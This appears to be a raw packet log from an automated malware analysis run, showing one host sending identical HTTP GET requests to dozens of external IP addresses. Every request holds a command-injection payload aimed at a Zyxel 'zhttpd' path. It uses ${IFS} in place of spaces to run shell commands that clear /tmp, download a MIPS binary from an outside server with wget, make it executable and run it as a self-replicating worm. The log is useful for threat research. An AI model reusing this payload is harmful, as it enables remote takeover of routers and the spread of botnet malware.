                                                Jan 28, 2024 10:16:42.056787968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8669192.168.2.233867248.236.193.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056833029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8670192.168.2.234304635.135.255.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056848049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8671192.168.2.2334804168.236.29.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056859016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8672192.168.2.2336416172.67.96.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056894064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8673192.168.2.233839290.60.93.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056945086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8674192.168.2.234883637.160.125.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056946993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8675192.168.2.234198047.74.138.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056962967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8676192.168.2.2352592125.107.31.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056986094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8677192.168.2.2341638142.225.181.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057030916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8678192.168.2.236075286.187.131.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057070017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8679192.168.2.234488012.38.247.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057101965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8680192.168.2.2338012104.219.57.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057101965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8681192.168.2.23357082.75.85.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057132006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8682192.168.2.2357158115.61.8.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057171106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8683192.168.2.2340504142.32.105.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057193041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8684192.168.2.2334164187.18.103.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057219982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8685192.168.2.236082272.180.142.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057260990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8686192.168.2.2360754116.210.79.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057269096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8687192.168.2.2340518176.180.135.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057291031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8688192.168.2.2339750202.4.107.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057333946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8689192.168.2.2334674116.183.125.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057370901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8690192.168.2.2358274185.166.11.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057391882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8691192.168.2.233608862.152.137.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057424068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8692192.168.2.2337084121.120.67.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057456017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8693192.168.2.23492502.139.109.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057457924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8694192.168.2.2342346189.65.129.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057485104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8695192.168.2.2333230221.194.164.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057498932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8696192.168.2.235592688.225.93.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057544947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8697192.168.2.235463060.246.41.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057579041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8698192.168.2.2337786179.126.63.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057594061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8699192.168.2.2344922201.14.47.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057610035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8700192.168.2.235327045.173.98.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057645082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8701192.168.2.23449681.172.251.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057682991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8702192.168.2.235554477.221.90.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057717085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8703192.168.2.235763484.250.102.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057739973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8704192.168.2.236095859.218.239.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057765961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8705192.168.2.234203681.207.37.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057801008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8706192.168.2.2347970114.100.174.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057811022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8707192.168.2.235838089.246.130.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057854891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8708192.168.2.2360294157.249.64.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057879925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8709192.168.2.2337286168.1.35.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057910919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8710192.168.2.2348222112.139.194.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057918072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8711192.168.2.234291062.192.226.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057966948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8712192.168.2.233871649.162.142.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.057985067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8713192.168.2.2333058193.124.74.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058017015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8714192.168.2.234776867.134.151.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058021069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8715192.168.2.2350112217.145.45.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058044910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8716192.168.2.2338484112.187.227.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058103085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8717192.168.2.233533620.120.194.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058111906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8718192.168.2.2335636111.215.220.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058161974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8719192.168.2.234483875.0.127.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058187008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8720192.168.2.235030272.234.191.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058222055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8721192.168.2.2344216141.97.24.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058248043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8722192.168.2.235412820.44.152.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058274984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8723192.168.2.2333168153.239.12.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058320045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8724192.168.2.2346578109.236.11.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058337927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8725192.168.2.234426295.18.96.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058363914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8726192.168.2.233460835.204.151.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058403015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8727192.168.2.2345084132.101.31.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058432102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8728192.168.2.2343782202.116.219.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058446884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8729192.168.2.2349860205.75.72.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058480978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8730192.168.2.235101836.161.8.108443
                                                TimestampBytes transferredDirectionData
